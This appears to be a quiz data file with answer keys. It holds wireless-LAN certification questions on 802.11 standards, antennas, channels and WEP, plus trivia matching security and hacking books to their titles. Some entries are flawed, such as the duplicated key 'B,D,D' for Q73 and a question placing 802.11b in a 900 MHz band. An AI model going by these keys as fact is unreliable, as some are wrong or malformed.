A#Wlan4SE Q 65. DSSS is a form of.	^A. spread spectrum radio	^B. user rate radio	^C. spreading ratio	^D. input parameter	^E. output parameter
B#Wlan4SE Q 66. Which specific antenna architecture is used to help eliminate RF null areas of coverage?	^A. splitters	^B. diversity	^C. high gain omni	^D. patch antennas
D#Wlan4SE Q 67. Which IEEE 802.11 task group is responsible for the development of WLAN security standards?	^A. 802.11d	^B. 802.11e	^C. 802.11f	^D. 802.11i
B#Wlan4SE Q 68. 802.11b operates using lower frequencies than 802.11a.	^A. False	^B. True	^C. This is not always true; must be judged case by case
A,B#Wlan4SE Q 69. Why is antenna diversity useful? (Choose two.)	^A. It alleviates null zones.	^B. It helps to overcome multi-path distortion.	^C. It allows the Access Point to cover two different cells.	^D. It adds more coverage area by using a directional antenna.
A#Wlan4SE Q 70. Because of some timing specifications in the 802.11 standard, what is the maximum distance that an Access Point can reliably connect to a client?	^A. approximately 1 mile or 1.6 km	^B. approximately 2 miles or 3.2 km	^C. 25+ miles or 40+ km	^D. no limit
B#Wlan4SE Q 71. A directional antenna focuses the RF signal more in one direction than others, thus decreasing the range more in that direction.	^A. True	^B. False	^C. This is not always true; must be judged case by case
D#Wlan4SE Q 72. How many channels in the 2.4 GHz band are available in an ETSI regulated country?	^A. 9	^B. 10	^C. 11	^D. 13	^E. 14
B,D,D#Wlan4SE Q 73. When doing a survey in a hospital application, which three should you consider? (Choose three.)	^A. pagers	^B. fire doors	^C. televisions	^D. microwave ovens	^E. radiology/X-ray areas
B#Wlan4SE Q 74. 802.11b access points generally offer greater range than 802.11a.	^A. This is not always true; must be judged case by case	^B. True	^C. False
A,B#Wlan4SE Q 75. What differentiates the FCC and ETSI regulations pertaining to 802.11b Wireless LANs? (Choose two.)	^A. power output of the radio	^B. number of defined channels	^C. number of clients allowed per Access Point	^D. type of antenna connector used on Access Points
B,C#Wlan4SE Q 76. What are two possible sources of interference for 802.11b devices in a home environment? (Choose two.)	^A. cellular phones	^B. cordless phones	^C. microwave ovens	^D. satellite dish receivers
B#Wlan4SE Q 77. Cisco Aironet 1200 Series supports both 802.11a and 802.11g.	^A. True	^B. False	^C. This is not always true; must be judged case by case
B#Wlan4SE Q 78. What is the highest transmission speed achievable with an IEEE 802.11b compatible radio?	^A. 2 Mbps	^B. 11 Mbps	^C. 15 Mbps	^D. 22 Mbps	^E. 54 Mbps
C,F#Wlan4SE Q 79. Which 5 GHz bands in the United States are designated for outdoor use only? (Choose two.)	^A. UNII-1	^B. UNII-2	^C. UNII-3	^D. 5.15-5.25 GHz	^E. 5.25-5.35 GHz	^F. 5.725-5.825 GHz
C#Wlan4SE Q 80. When performing the RF site survey, for maximum throughput your goal will be to ensure that access points are placed in a manner where the edge of the access point's propagation overlaps the propagation of the adjacent access point.	^A. False	^B. This is not always true; must be judged case by case	^C. True
D#Wlan4SE Q 81. An 802.11a radio utilizes what technique to transmit its signal?	^A. IR	^B. DSSS	^C. FHSS	^D. OFDM
A#Wlan4SE Q 82. How many channels are defined for use in the UNII-1 band under 802.11a standards?	^A. 4	^B. 8	^C. 11	^D. 13
B#Wlan4SE Q 83. When performing the RF site survey, in general you should choose a location that enables the access point antenna to have minimum line-of-sight propagation with the clients.	^A. True	^B. False	^C. This is not always true; must be judged case by case
A,C,E,F#Wlan4SE Q 84. In the U.S., no licensing is required for which four RF bands? (Choose four.)	^A. 902-928 MHz	^B. 800-820 MHz	^C. 2.400-2.483 GHz	^D. 2.500-2.600 GHz	^E. 5.150-5.350 GHz	^F. 5.725-5.825 GHz
C#Wlan4SE Q 85. After June 1994, FCC and DOC regulations require all antenna connectors to be proprietary (unique and non-standard). Cisco/Aironet has since used what connector on its Access Points and bridges?	^A. BNC	^B. RP-SMA	^C. RP-TNC	^D. N-connector
Wi-Fi #Wlan4SE Q 86. WECA was an organization promoting what wireless technology brand name?
A#Wlan4SE Q 87. The wireless medium of Cisco Aironet 350 Series Client Adapters is FHSS.	^A. False	^B. True	^C. This is not always true; must be judged case by case
D#Wlan4SE Q 88. What is the max transmission speed of 802.11b in 900 MHz band?	^A. 50	^B. 24	^C. 54	^D. 11
D#Wlan4SE Q 89. CSMA/CA is a	^A. feature no longer supported by Cisco	^B. media security protocol	^C. feature no longer supported by the latest WLAN standards	^D. media access protocol
milliwatt#Wlan4SE Q 90. The designator dBm is a decibel referenced to a(n) _____________.
A,C#Wlan4SE Q 117. When using WEP key hashing to enhance security, which two values are hashed together to create the per packet WEP key? (Choose two)	^A. WEP key	^B. CRC value	^C. Initialization Vector (IV)	^D. Nearest prime number to WEP key		
The Art of Exploitation	#Books Q1: Jon Erickson, Hacking, Date: 01. October 2003 ^  What's the subtitle?
The Shellcoder's Handbook	#Books Q2: Jack Koziol, David Litchfield, Dave Aitel Date: 01. March 2004 ^  Title?
Discovering and Exploiting Security Holes	#Books Q3: Jack Koziol, David Litchfield, Dave Aitel Date: 01. March 2004 ^  What's the subtitle?
The Art of Intrusion	#Books Q4: Kevin Mitnick, William L. Simon  subtitle: The Real Stories Behind the Exploits of Hackers, Intruders & Deceivers ^  Title?
The Art of Deception	#Books Q5:Kevin D. Mitnick, William L. Simon, Steve Wozniak subtitle: Controlling the Human Element of Security, ^  Title?
Controlling the Human Element of Security	#Books Q6: Kevin D. Mitnick, William L. Simon, Steve Wozniak Title: The Art of Deception, ^  Whats the subtitle?
Secrets and Lies	#Books Q8: Bruce Schneier date jan. 2004 subtitle: Digital Security in a Networked World ^  Title?
The Fugitive Game	#Books Q9: Jonathan Littman jan. 1997  subtitle: Online with Kevin Mitnick ^  Title?
The Cuckoo's Egg	#Books Q10: Clifford Stoll Oct 2000  subtitle: Tracking a Spy Through the Maze of Computer Espionage ^   Title?
The Masters of Deception	#Books Q11: Michelle Slatalla 1996 subtitle:  The Gang That Ruled Cyberspace ^   Title?
The Watchman	#Books Q12:Jonathan Littman 1997 subtitle: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen^  Title?
CYBERPUNK	#Books Q13:Katie Hafner 1995 subtitle: Outlaws and Hackers on the Computer Frontier, Revised ^   Title?
Security Warrior	#Books Q14: Cyrus Peikari, Anton Chuvakin 2004 subtitle: Know your Enemy. ^   Title?
Hacker Disassembling Uncovered	#Books Q15: Kris Kaspersky 2003 subtitle: Powerful techniques to safeguard your programming. ^   Title?
Hacking Exposed	#Books Q16: A series of books on computer forensics, W2k, W2k3, Linux, web applications and Network security. ^   Title?
Stealing the Network	#Books Q17:Ryan Russell, Ido Dubrawsky, FX, Joe Grand, Tim Mullen 2003 subtitle: How to Own the Box ^   Title?
Stealing the Network	#Books Q18:FX, Paul Craig, Joe Grand, Tim Mullen, Fyodor, Ryan Russell, Jay Beale  subtitle: How to Own a Continent ^    Title?
Zero Day Exploit	#Books Q19: Rob Shein aka Rogue Shoten, David Litchfield 2004  Subtitle:Countdown to darkness ^   Title?
Fugitive game		#Books Q20: The title of Jonathan Littman's book concentrating on Kevin Mitnick
What is underground	#Books Q21: The title of the book written by the Australian Author Suelette Dreyfus in 1997
Secrets of a Super Hacker	#Books Q22: The title of the book written by Knightmare, Gareth Branwyn (Introduction) in 1994
The Cyberthief and the Samurai	#Books Q23: Jeff Goodell 1996 subtitle: The true story of Kevin Mitnick and the man who hunted him down. ^    Title?